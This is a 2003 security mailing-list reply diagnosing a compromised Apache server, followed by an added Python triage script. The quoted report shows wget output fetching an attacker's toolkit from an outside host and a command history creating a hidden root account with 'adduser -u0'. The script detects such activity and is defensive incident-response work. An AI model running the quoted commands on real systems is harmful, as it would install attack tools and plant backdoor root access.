Mailinglist Archive: opensuse-security (334 mails)

Re: Apache Gain Remote Shell Access
  • From: Stefan Andreas Tichy <listuser@xxxxxxxxx>
  • Date: Wed, 3 Sep 2003 19:37:14 +0200
  • Message-id: <20030903173714.GA7974@xxxxxxxxxxxxxxxx>
On Thu, Sep 04, 2003 at 12:43:07AM +0800, Marco Lum wrote:
> The following was found in the error_log of Apache
>
> --09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz
> => `vulturu.tgz'
> Resolving www.vulturul.org... done.
> Connecting to www.vulturul.org[195.110.124.188]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 9,432 [application/x-tar]
>
> 0K ......... 100%
> 13.69 KB/s
>
> 09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]


Wget output in apache error_log. Check for a CGI (shell script?)
allowing clients to execute arbitrary commands.



> Also found his command history:
>
>
> id
> /usr/sbin/adduser vulturul -u0 -g0 -M;

He has root access but is not sure about that?

At least two problems. Execution of commands as user wwwrun and
local root compromise.

I hope the box has been disconnected from the network already.


--
Stefan Tichy <listuser@xxxxxxxxx>
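
Added example, not part of the original message: a triage sketch for the two findings discussed in this thread, flagging wget output that sits in error_log outside Apache's own line format and listing passwd entries with UID 0 other than root. The function names, the sample host and address, and the assumption that unprefixed lines are CGI child stderr are all constructed for illustration.

```python
import re

# Apache's own error_log entries start "[Wed Sep 03 09:41:05 2003] [error] ...".
# Assumption: any other line is stderr of a child process (e.g. a CGI script).
APACHE_LINE = re.compile(r"^\[[A-Z][a-z]{2} [A-Z][a-z]{2} [ \d]\d [\d:.]+ \d{4}\] \[")
# Shapes of a wget transcript, modelled on the output quoted in this thread.
WGET_MARKERS = [
    re.compile(r"^--\d{2}:\d{2}:\d{2}--\s+(\S+)"),        # "--HH:MM:SS-- URL"
    re.compile(r"^Resolving \S+\.\.\."),
    re.compile(r"^Connecting to \S+\[[\d.]+\]:\d+\.\.\."),
    re.compile(r"^HTTP request sent, awaiting response"),
    re.compile(r"saved \[\d+/\d+\]$"),
]

def scan_error_log(lines):
    """Return (line numbers of wget output outside Apache's format, fetched URLs)."""
    hits, urls = [], []
    for number, raw in enumerate(lines, 1):
        line = raw.strip()
        if not line or APACHE_LINE.match(line):
            continue
        for pattern in WGET_MARKERS:
            match = pattern.search(line)
            if match:
                hits.append(number)
                if pattern is WGET_MARKERS[0]:
                    urls.append(match.group(1))
                break
    return hits, urls

def extra_uid0_accounts(passwd_text):
    """Return names of passwd entries with UID 0 other than root."""
    fields = (entry.split(":") for entry in passwd_text.splitlines())
    return [f[0] for f in fields if len(f) >= 4 and f[2] == "0" and f[0] != "root"]

# Constructed sample input (host, address and paths are placeholders).
SAMPLE_LOG = """\
[Wed Sep 03 09:41:05 2003] [error] [client 192.0.2.10] File does not exist: /srv/www/htdocs/x
--09:41:10-- http://files.example.org/a/pkg.tgz
=> `pkg.tgz'
Resolving files.example.org... done.
Connecting to files.example.org[192.0.2.80]:80... connected.
HTTP request sent, awaiting response... 200 OK
09:41:17 (13.69 KB/s) - `pkg.tgz' saved [9432/9432]
""".splitlines()
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nwwwrun:x:30:8::/var/lib/wwwrun:/bin/false\nvulturul:x:0:0::/home/vulturul:/bin/bash\n"

if __name__ == "__main__":
    print(scan_error_log(SAMPLE_LOG))
    print(extra_uid0_accounts(SAMPLE_PASSWD))
```

On a host believed compromised, run such checks against copies of the log and passwd files taken from offline media, since files on the running system may have been altered.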
